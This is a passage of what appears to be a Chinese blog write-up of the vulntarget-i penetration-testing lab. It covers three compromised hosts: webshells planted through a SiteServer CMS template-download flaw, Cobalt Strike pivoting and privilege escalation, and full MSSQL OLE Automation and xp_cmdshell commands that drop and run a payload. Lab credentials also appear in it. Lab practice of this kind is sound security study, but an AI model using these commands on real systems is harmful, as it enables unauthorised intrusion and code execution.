vulntarget-i 打靶记录(下)

简介: vulntarget-i 打靶记录

尝试连接3389发现没开,cmd下启动:

run REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面

利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向

扫描存活指向第二台135主机,利用CS开了socket代理进内网


No2


2.1getshell-1

端口扫描发现开放8000端口利用前面浏览器抓到的密码成功登进后台,siteserver cms版本6.15翻了一下漏洞尝试利用模板下载漏洞getshell

跑C#程序得到加密后的downloadUrl值然后放入路径:

/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=参数&directoryName=suce

不会显示下载成功,但是文件的确会进行自己解压

尝试访问webshell页面白色成功解析,利用蚁剑成功连接


2.2 getshell-2


木马构造同上

附件上传设置把zip,rar后缀添加白名单使得构造的自解压压缩包能上传上去

shell路径:/SiteFiles/SiteTemplates/压缩包名/shell名.aspx


2.3 getshell-3


上传设置添加aspx后缀白名单,内容管理上传图片会显示重命名后的文件路径

使用蚁剑连接即可


2.4 内网渗透


拿到权限之后命令执行发现不出网主机,准备利用第一台主机做跳板机转发上线

使用第一台上线的靶机做转发上线建立监听地址,注意IP地址选第二张网卡因为内网其他网段不通默认网卡

在做exe木马生成的之后选择分阶木马payload选择新建的转发监听器上传靶机执行上线

尝试提权的时候这里使用梼杌的插件只能连接到公网CS监听器,内网已控主机的监听器是不存在的,这时候可以使用ms16-075的exe启动木马得到system权限但有些麻烦,巨龙拉古插件内置了此功能

选择本地提权功能在弹出的窗口下执行木马即可获取system权限,尝试读取cms数据库配置文件

查看IP发现不在本地上存在双网站库分离环境,尝试开启socket服务利用Proxifier创建代理链

本地连接使用Navicat,MDUT工具mssql数据库

发现sa账号密码字段拿去解密付费后得到明文为QwE123asd,尝试sa用户利用MDUT登陆数据库,可以使用certutil编码转exe文件实现落地,这里尝试sp_oacreate组件落地


3. No3


3.1 文件落地


启用OLE组件:

exec master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE
exec master.dbo.sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

利用python转hex编码脚本把生成的马子转成hex,这里木马的生成和第二台主机一致均为转发上线这里不再阐述

把跑好后的hex编码放在OLE组件内并创建命令执行存储过程 命令:

DECLARE @DATAVARBINARY(MAX)= 0x-hex DECLARE @filepath VARCHAR(MAX)='C:\\Windows\\temp\\cs.exe'DECLARE @ObjectToken INTEXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUTEXEC sp_OASetProperty @ObjectToken,'Type',1EXEC sp_OAMethod @ObjectToken,'Open'EXEC sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC sp_OAMethod @ObjectToken,'Close'EXEC sp_OADestroy @ObjectToken SELECT @filepath

但当我使用xp_cmdshell执行的时候提示拒绝访问,可能是权限太低了索性写到C:\Users\Public\Downloads\n.exe目录内,在调用cmd执行

成功上线CS命令:

exec master..xp_cmdshell "cmd /c C:\\Users\\Public\\Downloads\\n.exe"

处理提权的操作和第二台一致

成功拿下三台主机

为了贴近实战使用公网CS主机来打测试中代理链不稳可以使用Stowaway来搭多级代理。

相关文章
|
安全 Oracle 关系型数据库
WebLogic Server 账号密码密文解密小方法
WebLogic Server 账号密码密文解密小方法,具体操作看下文
971 3
|
安全 网络安全 PHP
CISP-PTE综合靶机-WinServer2008学习
CISP-PTE综合靶机-WinServer2008学习
1250 0
SpringCloud服务已经关但是Eureka还是显示up
SpringCloud服务已经关但是Eureka还是显示up
308 0
|
11月前
|
存储 安全 网络安全
.[[BitCloud@cock.li]].wstop勒索病毒数据怎么处理|数据解密恢复
在数字化时代,数据安全威胁日益严重,勒索病毒以其独特的加密技术对个人和企业构成重大挑战。.wstop勒索病毒,如[[BitCloud@cock.li]].wstop等,通过加密用户文件要求赎金,传播途径多样,影响广泛。遭遇攻击时,及时求助专业服务(如vx技术服务号data388)至关重要。预防策略包括强化网络安全防护、定期更新软件、谨慎处理邮件附件、安装防病毒软件、定期备份数据及提高安全意识等。面对不断演变的勒索病毒,如2024年出现的多种变种,企业和个人应加强服务器安全加固与数据备份,共同维护网络安全环境。关注“91数据恢复”可获取更多帮助和支持。
672 14
|
SQL JSON Apache
iLogtail 2.0 重大升级,端上支持 SPL
日志数据格式可能是多样且复杂的,iLogtail 插件配置模式已经可以很好的支持复杂数据的处理。iLogtail2.0 又带来了 SPL 语法的重大支持,在日志处理场景下,可以通过多级管道对数据进行交互式、递进式的探索和处理,从配置交互和性能上,都有比较大的提升和优化。iLogtail2.0 已经在逐步灰度中,欢迎大家体验和使用。
41878 118
|
网络协议 JavaScript 前端开发
使用正则表达式验证身份证号、QQ号、手机号、邮箱、地址、邮编、银行卡号、学号、车牌号、快递单号、验证码、ISBN号、网址、IPV4地址、IPV6地址、出生年月日、姓名1
使用正则表达式验证身份证号、QQ号、手机号、邮箱、地址、邮编、银行卡号、学号、车牌号、快递单号、验证码、ISBN号、网址、IPV4地址、IPV6地址、出生年月日、姓名
872 0
|
SQL Shell 数据库
MSSQL绕过微软杀毒提权案例
MSSQL绕过微软杀毒提权案例
530 0
|
SQL 开发框架 前端开发
在C#开发中使用第三方组件LambdaParser、DynamicExpresso、Z.Expressions,实现动态解析/求值字符串表达式
在C#开发中使用第三方组件LambdaParser、DynamicExpresso、Z.Expressions,实现动态解析/求值字符串表达式
|
人工智能 IDE 测试技术
Visual Studio版本的AI编程助手
Visual Studio 是一个出色的 IDE,可用于构建适用于 Windows、Mac、Linux、iOS 和 Android 的丰富、精美的跨平台应用程序。 使用一系列技术(例如 WinForms、WPF、WinUI、MAUI 或 Xamarin)构建丰富。 1、安装 点击上方工具栏拓展选项,选择管理拓展选项 接着在联机页面中搜索"FItten Code",并点击下载,下载完成后重启Visual Studio 在扩展选项中选中fitten,选择Open Chat Window进入登录界面,完成注册登录 2、智能补全 打开代码文件,输入一段代码,Fitten Code 就会为您
285 0
|
SQL 存储 分布式计算
Hive Delegation Token 揭秘
本篇文章是由一次 Hive 集群生产优化而引出的知识点,供大家参考
357 2